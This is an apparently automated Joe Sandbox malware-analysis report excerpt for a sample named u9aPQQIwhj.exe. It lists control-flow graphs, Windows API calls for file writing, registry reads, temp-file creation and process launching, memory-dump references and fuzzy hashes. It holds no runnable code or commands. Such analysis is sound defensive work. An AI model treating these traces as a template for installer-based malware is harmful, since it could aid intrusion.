                                                  control_flow_graph 961 403060-40306e 962 403070-403086 SetFilePointer 961->962 963 40308c-403095 call 40317b 961->963 962->963 966 403175-403178 963->966 967 40309b-4030ae call 405bd7 963->967 970 403161 967->970 971 4030b4-4030c8 call 40317b 967->971 973 403163-403164 970->973 971->966 975 4030ce-4030d1 971->975 973->966 976 4030d3-4030d6 975->976 977 40313d-403143 975->977 980 403172 976->980 981 4030dc 976->981 978 403145 977->978 979 403148-40315f ReadFile 977->979 978->979 979->970 982 403166-40316f 979->982 980->966 983 4030e1-4030eb 981->983 982->980 984 4030f2-403104 call 405bd7 983->984 985 4030ed 983->985 984->970 988 403106-40311b WriteFile 984->988 985->984 989 403139-40313b 988->989 990 40311d-403120 988->990 989->973 990->989 991 403122-403135 990->991 991->983 992 403137 991->992 992->980
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                  • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID: x>A
                                                  • API String ID: 539440098-3854404225
                                                  • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                  • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                  • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                  • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 993 405db5-405de7 RegOpenKeyExW 994 405e29-405e2c 993->994 995 405de9-405e08 RegQueryValueExW 993->995 996 405e16 995->996 997 405e0a-405e0e 995->997 999 405e19-405e23 RegCloseKey 996->999 998 405e10-405e14 997->998 997->999 998->996 998->999 999->994
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
                                                  • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3677997916-1824292864
                                                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405BA1
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-678247507
                                                  • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                  • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                  • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                  • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                  APIs
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                    • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                    • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
                                                  • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                  • Opcode Fuzzy Hash: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
                                                  • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • CloseHandle.KERNEL32(?), ref: 00405695
                                                  Strings
                                                  • Error launching installer, xrefs: 00405676
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                  • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                  • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                  APIs
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061DF
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061F3
                                                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00406206
                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00403345
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 4115351271-517883005
                                                  • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                  • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                                  • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                  • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                  • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                  • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                  • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                  • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                  • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                  • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                  • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                  • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                  • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                  • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                  • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                  • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                  • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                  • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                  • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                  • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                  • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                  • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                  • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                  • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                  • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                  APIs
